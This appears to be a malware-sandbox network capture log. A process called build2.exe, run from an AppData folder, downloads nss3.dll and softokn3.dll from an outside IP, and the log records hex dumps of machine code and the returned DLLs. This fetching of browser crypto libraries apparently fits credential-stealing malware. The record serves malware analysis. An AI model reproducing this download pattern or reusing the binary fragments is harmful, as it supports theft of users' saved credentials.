2024-04-04 15:49:33 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-04-04 15:49:33 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
2024-04-04 15:49:33 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-04-04 15:49:33 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.10	49784	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:35 UTC	217	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Cache-Control: no-cache
2024-04-04 15:49:36 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:35 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
2024-04-04 15:49:36 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-04-04 15:49:36 UTC	16384	IN	Data Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18 Data Ascii: i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQAQ
2024-04-04 15:49:36 UTC	16384	IN	Data Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85 Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-04-04 15:49:36 UTC	16384	IN	Data Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
2024-04-04 15:49:36 UTC	16384	IN	Data Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83 Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
2024-04-04 15:49:36 UTC	16384	IN	Data Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
2024-04-04 15:49:36 UTC	16384	IN	Data Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00 Data Ascii: h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
2024-04-04 15:49:36 UTC	16384	IN	Data Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
2024-04-04 15:49:36 UTC	16384	IN	Data Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02 Data Ascii: WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
2024-04-04 15:49:36 UTC	16384	IN	Data Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9 Data Ascii: D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.10	49798	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:38 UTC	221	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Cache-Control: no-cache
2024-04-04 15:49:39 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:39 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-04-04 15:49:39 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-04-04 15:49:39 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-04-04 15:49:39 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-04-04 15:49:39 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-04-04 15:49:39 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-04-04 15:49:39 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
